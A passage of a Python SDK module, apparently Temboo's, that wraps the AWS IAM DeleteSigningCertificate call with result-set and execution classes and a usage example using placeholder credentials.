    A ResultSet with methods tailored to the values returned by the DeleteSigningCertificate Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, json_str):
        # Parameter renamed from `str` to avoid shadowing the builtin.
        return json.loads(json_str)

    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
        """
        return self._output.get('Response', None)


class DeleteSigningCertificateChoreographyExecution(ChoreographyExecution):

    def _make_result_set(self, response, path):
        return DeleteSigningCertificateResultSet(response, path)
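

# A minimal usage sketch, assuming the standard Temboo SDK session/execute
# pattern (every credential and ID value below is a hypothetical placeholder,
# not a working key):
def _example_delete_signing_certificate():
    from temboo.core.session import TembooSession
    session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')
    choreo = DeleteSigningCertificate(session)
    inputs = choreo.new_input_set()
    inputs.set_AWSAccessKeyId('AKIAEXAMPLEKEY')
    inputs.set_AWSSecretKeyId('EXAMPLESECRETKEY')
    inputs.set_CertificateId('TA7SMP42TDN5EXAMPLE')
    results = choreo.execute_with_results(inputs)
    return results.get_Response()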
|